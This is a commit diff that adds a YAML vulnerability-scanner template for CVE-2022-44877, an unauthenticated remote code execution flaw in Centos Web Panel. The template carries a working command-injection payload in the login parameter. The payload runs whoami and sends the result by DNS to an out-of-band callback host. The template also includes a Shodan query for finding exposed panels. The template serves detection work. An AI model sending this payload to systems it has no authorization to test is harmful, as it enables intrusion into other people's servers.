Merge pull request #6483 from For3stCo1d/CVE-2022-44877

Create CVE-2022-44877.yaml
2023-01-10 07:12:20 +05:30 · 2023-01-10 07:12:20 +05:30 · af73568c62
parent 3adcdb39c1 c36aa24a1f
commit af73568c62
1 changed files with 50 additions and 0 deletions
--- a/cves/2022/CVE-2022-44877.yaml
+++ b/cves/2022/CVE-2022-44877.yaml
@ -0,0 +1,50 @@
+id: CVE-2022-44877
+
+info:
+  name: Centos Web Panel - Unauthenticated Remote Code Execution
+  author: For3stCo1d
+  severity: critical
+  description: |
+    RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.
+  reference:
+    - https://twitter.com/_0xf4n9x_/status/1612068225046675457
+    - https://github.com/numanturle/CVE-2022-44877
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-44877
+  classification:
+    cve-id: CVE-2022-44877
+  metadata:
+    verified: true
+    shodan-query: http.title:"Login | Control WebPanel"
+  tags: cve,cve2022,centos,rce
+
+requests:
+  - raw:
+      - |
+        POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=root&password=toor&commit=Login
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "Login Redirect."
+
+      - type: status
+        status:
+          - 302
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'